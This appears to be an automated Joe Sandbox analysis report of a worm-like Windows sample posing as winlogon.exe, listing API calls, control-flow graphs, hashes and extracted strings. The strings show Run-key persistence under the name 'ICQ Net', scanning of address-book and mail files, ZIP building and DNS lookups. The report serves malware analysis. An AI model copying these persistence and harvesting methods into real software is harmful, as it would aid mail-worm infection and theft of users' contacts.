                                                                                                                                                                                                            • API String ID: 316229882-0
                                                                                                                                                                                                            • Opcode ID: b529439db7e07ea534753e5dd505f7efad80a7dff303fa21c44e8ba2b60a4040
                                                                                                                                                                                                            • Instruction ID: 9ddc651c384a72fcc8bbbb9fb6b64fc80d3b8357a1baf8a30aa09fcb334ba20b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b529439db7e07ea534753e5dd505f7efad80a7dff303fa21c44e8ba2b60a4040
                                                                                                                                                                                                            • Instruction Fuzzy Hash: EDE05BB4361301AAEB115B349D49BBA3AD4AB85792F01C87AF905D51E0FB7DC490991C
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 90 403c81-403c8c 91 403c99-403c9b 90->91 92 403c8e-403c8f call 404dcb 90->92 94 403ca0-403caf RtlAllocateHeap 91->94 95 403c9d-403c9f 91->95 96 403c94-403c97 92->96 97 403cb5-403cb6 94->97 95->94 96->91 96->97
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00403CAF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: 27d190d87eb390a2e4b2e32f777bb7342ca319cf0b8b1bda9bdf53b3c12d4fd0
                                                                                                                                                                                                            • Instruction ID: 30c31515092504ca0bfbc9572f52f6af0897c4269d2eaf9da3154517631336a6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27d190d87eb390a2e4b2e32f777bb7342ca319cf0b8b1bda9bdf53b3c12d4fd0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5CE0C23381953096EA212B18BE057CB3A18AF01B65F060237FC44BB2E1C7386D4045DC
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 98 405185-405195 99 405197-405199 98->99 100 4051a0-4051b2 99->100 101 40519b-40519e 99->101 102 4051b5-4051bf 100->102 101->99 102->102 103 4051c1-4051de VirtualAlloc 102->103 104 4051e0-4051e3 103->104 105 4051e8-4051f0 103->105 106 40527b-40527f 104->106 107 4051f2 105->107 108 40522e-405266 105->108 109 4051f5-40522c 107->109 110 405268 108->110 111 40526b-405279 108->111 109->108 109->109 110->111 111->106
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00008000,00001000,?,00000013,00000000,000000E0,?,?,00404EAB,000000E0,00000013,?,74D656E0,0040143F,?), ref: 004051D6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                                            • Opcode ID: 35503fca1021ab05d7b52264e6852854c2d22391e621d232ca43d378a29343d6
                                                                                                                                                                                                            • Instruction ID: 0271b84711de76720c0d7ff4873a7005d34d77c44ce78967c8b955fafef921a3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35503fca1021ab05d7b52264e6852854c2d22391e621d232ca43d378a29343d6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60317A316006069FD314CF18C884BA6BBE4FF54368F29C2BED1598B2E1D7749946CB44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00402D25
                                                                                                                                                                                                            • FindNextFileA.KERNEL32(00000000,00000010), ref: 00402E1F
                                                                                                                                                                                                              • Part of subcall function 00402A51: _lopen.KERNEL32(?,00000000), ref: 00402AB8
                                                                                                                                                                                                              • Part of subcall function 00402A51: _hread.KERNEL32(?,?,00001000), ref: 00402AF4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFind$FirstNext_hread_lopen
                                                                                                                                                                                                            • String ID: .$.$\*.*$shar
                                                                                                                                                                                                            • API String ID: 2610364250-3271563406
                                                                                                                                                                                                            • Opcode ID: 17bfe433173d05b078ab22fbc6c5e0251c3b952f2a5661c611d3afa1f79ac6b2
                                                                                                                                                                                                            • Instruction ID: af0736c58c016ddeb0cabaee310bdccb81470b733d605c7cd839ae1c487058f6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17bfe433173d05b078ab22fbc6c5e0251c3b952f2a5661c611d3afa1f79ac6b2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14311E7284066C6ADF25AA65CD4DBDF766C6B04309F1404FBE609F21C1E6BC8BC44E69
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$BeepCurrentLocalPriorityTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3686384232-0
                                                                                                                                                                                                            • Opcode ID: fdba3ae7979aba323897c0d329bc27605f4b2cd2cd63e45208a44457f8ee10c2
                                                                                                                                                                                                            • Instruction ID: 666856a2101ccab237df132475821c9f98106921f9c098f37887d323279d59a2
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdba3ae7979aba323897c0d329bc27605f4b2cd2cd63e45208a44457f8ee10c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28F08C20D41205AACF10BFA0D90E87E7A7DAB0031AF11C52BA152721D2ABB90BC4836E
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000400), ref: 00402ECA
                                                                                                                                                                                                            • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 00402F45
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,ICQ Net,00000000,00000001,?,00000000), ref: 00402F6B
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00402E7F
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegDeleteValueA.ADVAPI32(?,?), ref: 00402E8F
                                                                                                                                                                                                              • Part of subcall function 00402E72: RegCloseKey.ADVAPI32(?), ref: 00402E98
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseOpenValue$DeleteDirectoryWindows
                                                                                                                                                                                                            • String ID: -stealth$CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}\InProcServer32$DELETE ME$Explorer$ICQ Net$KasperskyAv$OLE$SOFTWARE\Microsoft\Windows\CurrentVersion\Run$SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices$Sentry$Software\Microsoft\Windows\CurrentVersion\Explorer\PINF$System\CurrentControlSet\Services\WksPatch $Taskmon$Windows Services Host$\$au.exe$d3dupdate.exe$msgsvr32$service$system.$winlogon.exe
                                                                                                                                                                                                            • API String ID: 4164969765-2502385722
                                                                                                                                                                                                            • Opcode ID: 3e919cdd1f604cd2d3d721d2b75f27e015d90c453604e91f09a279d551d168de
                                                                                                                                                                                                            • Instruction ID: 84feb7293dd50699fc8e53e7ee761e706d635917d92738f507599102555b4bc5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e919cdd1f604cd2d3d721d2b75f27e015d90c453604e91f09a279d551d168de
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 174184A25C031475C620B772CD4EF9B3A6CDF65759F60007BBA09710C2CABC991046FE
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 494 4010a4-4010ee call 403280 497 4010f0-4010f3 494->497 498 4010f5-401107 getservbyname 494->498 499 401111 htons 497->499 500 401109-40110d 498->500 501 40110f 498->501 502 401113-401126 inet_addr 499->502 500->502 501->499 503 401128-401133 gethostbyname 502->503 504 40113f-401150 socket 502->504 505 401135-40113c 503->505 506 40115a-40115c 503->506 507 401152 504->507 508 40115e-40121e htons * 2 call 401000 htons * 2 setsockopt * 2 sendto 504->508 505->504 510 401154-401155 506->510 507->510 513 401220 508->513 514 401225-401241 recvfrom 508->514 512 401264-401267 510->512 515 401222-401223 513->515 516 401243-40124e WSAGetLastError 514->516 517 401258 514->517 518 40125a-401263 closesocket 515->518 519 401250-401252 516->519 520 401254-401256 516->520 517->518 518->512 519->515 520->518
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • getservbyname.WS2_32(nameserver,UDP), ref: 004010FF
                                                                                                                                                                                                            • htons.WS2_32(00000035), ref: 00401111
                                                                                                                                                                                                            • inet_addr.WS2_32(?), ref: 0040111A
                                                                                                                                                                                                            • gethostbyname.WS2_32(?), ref: 0040112B
                                                                                                                                                                                                            • socket.WS2_32(00000002,00000002,00000000), ref: 00401144
                                                                                                                                                                                                            • htons.WS2_32(000011DF), ref: 00401164
                                                                                                                                                                                                            • htons.WS2_32(00000001), ref: 00401176
                                                                                                                                                                                                            • htons.WS2_32(00000002), ref: 004011B6
                                                                                                                                                                                                            • htons.WS2_32(00000001), ref: 004011C2
                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001006,?,?), ref: 004011ED
                                                                                                                                                                                                            • setsockopt.WS2_32(?,0000FFFF,00001005,00000FA0,?), ref: 004011FF
                                                                                                                                                                                                            • sendto.WS2_32(?,00000000,-00000010,00000000,00000002,00000010), ref: 00401215
                                                                                                                                                                                                            • recvfrom.WS2_32(?,?,00000800,00000000,00000002,?), ref: 00401238
                                                                                                                                                                                                            • WSAGetLastError.WS2_32 ref: 00401243
                                                                                                                                                                                                            • closesocket.WS2_32(?), ref: 0040125B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: htons$setsockopt$ErrorLastclosesocketgethostbynamegetservbynameinet_addrrecvfromsendtosocket
                                                                                                                                                                                                            • String ID: UDP$nameserver
                                                                                                                                                                                                            • API String ID: 2147619886-4175462922
                                                                                                                                                                                                            • Opcode ID: c2c4ea1a7d312aeaef9fa15988cadba241fcaab0d9df87588d876636e5593e70
                                                                                                                                                                                                            • Instruction ID: 54f4538c7bcc46d7fdc4aaefdd6ffe4718887d5174617e4dee6c76f625f832c1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c4ea1a7d312aeaef9fa15988cadba241fcaab0d9df87588d876636e5593e70
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F251C331500258AADB10AF64DC45BDEB7B9FF04320F204276FA56FA2E1DBB44A518BD9
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 521 402a51-402a73 call 4037d0 call 402a20 526 402c53-402c57 521->526 527 402a79-402a8b call 403720 521->527 531 402a90-402aa1 call 403800 527->531 534 402aa3 531->534 535 402aa5-402aa9 531->535 534->535 535->531 536 402aab-402aad 535->536 536->526 537 402ab3-402ac4 _lopen 536->537 537->526 538 402aca-402af1 call 403630 537->538 541 402af4-402b00 _hread 538->541 542 402b06-402b32 call 403720 call 403a80 541->542 543 402c4a-402c4d _lclose 541->543 549 402b38-402b49 call 403a80 542->549 550 402bef-402c13 call 40278e call 4027b4 call 4028a4 542->550 543->526 549->550 556 402b4f-402b60 call 403a80 549->556 563 402c16-402c45 _llseek call 403630 550->563 556->550 562 402b66-402b77 call 403a80 556->562 562->550 568 402b79-402b8a call 403a80 562->568 563->541 571 402bd4-402bed call 40278e call 4028a4 568->571 572 402b8c-402b9d call 403a80 568->572 582 402bd1-402bd2 571->582 572->571 577 402b9f-402bb0 call 403a80 572->577 577->571 583 402bb2-402bc3 call 403a80 577->583 582->563 583->571 586 402bc5-402bcc call 4028a4 583->586 586->582
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _lopen.KERNEL32(?,00000000), ref: 00402AB8
                                                                                                                                                                                                            • _hread.KERNEL32(?,?,00001000), ref: 00402AF4
                                                                                                                                                                                                            • _llseek.KERNEL32(?,?,00000000), ref: 00402C1E
                                                                                                                                                                                                            • _lclose.KERNEL32(?), ref: 00402C4D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _hread_lclose_llseek_lopen
                                                                                                                                                                                                            • String ID: .adb$.dbx$.doc$.msg$.oft$.sht$.tbb$.wab$~A
                                                                                                                                                                                                            • API String ID: 2871481721-694717425
                                                                                                                                                                                                            • Opcode ID: f997f1769d21b2a8984a50a65d8a8aa9511750919e931a6c6a8c0fd5281e9e5e
                                                                                                                                                                                                            • Instruction ID: f2dafe6271f346f72b0dcdc4685929b99cb8ccfb922ebbe08748fce3a86fe255
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f997f1769d21b2a8984a50a65d8a8aa9511750919e931a6c6a8c0fd5281e9e5e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9651D676600209BAEF15EFA1DE49ADE7B7CDF04326F2041BBF400B10D1DBB89E904A18
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 588 4017ad-4017dd 590 4019e0-4019e2 588->590 591 4017e3-4017e5 588->591 593 4019e3-4019e7 590->593 591->590 592 4017eb-401804 591->592 595 40180a-40180c 592->595 596 4019db-4019de 592->596 595->596 598 401812-4018fb call 403280 * 3 call 4019e8 call 401a6d GetFileSize * 2 WriteFile * 2 SetFilePointer 595->598 597 4019ce-4019d9 596->597 597->593 613 401901-401920 ReadFile 598->613 614 401922-401925 613->614 615 401943-4019c5 WriteFile * 3 613->615 614->615 616 401927-401941 WriteFile 614->616 615->597 616->613
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 004019E8: GetSystemTime.KERNEL32(0000001E,0000001E), ref: 004019F2
                                                                                                                                                                                                              • Part of subcall function 00401A6D: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,0041A051), ref: 00401A81
                                                                                                                                                                                                              • Part of subcall function 00401A6D: ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 00401AA8
                                                                                                                                                                                                              • Part of subcall function 00401A6D: SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 00401AE6
                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 00401891
                                                                                                                                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040189D
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,04034B50,0000001E,?,00000000), ref: 004018D5
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000), ref: 004018E8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 004018FB
                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000400,?,00000000), ref: 00401918
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401939
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,0000002E,?,00000000), ref: 0040196F
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000), ref: 00401982
                                                                                                                                                                                                            • WriteFile.KERNEL32(?,06054B50,00000016,?,00000000), ref: 004019C3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Write$Pointer$ReadSize$SystemTime
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1177281838-3916222277
                                                                                                                                                                                                            • Opcode ID: aab24eb8617f8d725d7d8e24e7180a7e7e8e5969de52de2914c22b74f2718137
                                                                                                                                                                                                            • Instruction ID: b2c603c1d1320f768cb9f7d01f3a84518a27657aa67346375d6e3d71cd624553
                                                                                                                                                                                                            • Opcode Fuzzy Hash: aab24eb8617f8d725d7d8e24e7180a7e7e8e5969de52de2914c22b74f2718137
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6071267590121CBADF11DFA1CC84EDFBBB9FF08350F10412AF914AA2A0D7359A54CBA8
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 619 401335-40139b htons * 3 620 40139e-4013a2 619->620 621 4013a4-4013ad 620->621 622 4013de-4013ed call 403720 620->622 621->620 623 4013af-4013dc 621->623 626 401404-401417 htons 622->626 627 4013ef-401403 call 403720 622->627 623->620 629 401419-40141c 626->629 630 40142b-401435 htons 626->630 627->626 629->630 632 40141e-401427 htons 629->632 633 401447-401449 630->633 634 401437-401445 call 401268 630->634 632->630 636 401567-40156b 633->636 634->633 638 40144e-401452 634->638 639 401458-401469 htons 638->639 640 40155b-401566 call 4012af 638->640 642 4014ff-401512 htons 639->642 643 40146f-401470 639->643 640->636 645 401514-40153b inet_ntoa call 403630 642->645 646 40153c-40153f 642->646 643->646 647 401476-401479 643->647 645->646 646->640 648 401541-40154b htons 646->648 650 4014e9-4014fd call 40104e 647->650 651 40147b-40147e 647->651 654 40154f-401552 648->654 650->646 652 401480-401487 651->652 653 40148c-4014a4 call 40104e 651->653 652->646 653->646 661 4014aa-4014e1 call 403630 htons 653->661 654->639 658 401558-401559 654->658 658->654 661->646 664 4014e3-4014e7 661->664 664->646
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000408000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749715538.0000000000418000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749760003.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749772339.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_winlogon.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: htons
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4207154920-0
                                                                                                                                                                                                            • Opcode ID: 3b681f48e5d0c725af44bdea3f5e9e1581bd8ae6c8751c1361cb48875ca40376
                                                                                                                                                                                                            • Instruction ID: 9b5c7b10500d90536ef99daddf581d525364c1f5c7a8bc25fbad06f6334030b0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b681f48e5d0c725af44bdea3f5e9e1581bd8ae6c8751c1361cb48875ca40376
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6661C47A804209ABCB14DFA4C8457EEBBB4FF04314F50446BE406B76A1D77CDA85CB98
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 665 4057eb-4057f6 666 4057f8-405807 LoadLibraryA 665->666 667 40583a-405841 665->667 668 405870-405872 666->668 669 405809-40581e GetProcAddress 666->669 670 405843-405849 667->670 671 405859-405865 667->671 672 40586c-40586f 668->672 669->668 673 405820-405835 GetProcAddress * 2 669->673 670->671 675 40584b-405852 670->675 671->672 673->667 675->671 676 405854-405857 675->676 676->671
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.USER32(user32.dll,?,00000000,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 004057FD
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,MessageBoxA,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405815
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,GetActiveWindow,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405826
                                                                                                                                                                                                            • GetProcAddress.USER32(00000000,GetLastActivePopup,?,004049ED,?,Microsoft Visual C++ Runtime Library,00012010,?,00406844,?,00406894,?,?,?,Runtime Error!Program: ), ref: 00405833
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000001.00000002.1749715538.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000001.00000002.1749700413.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
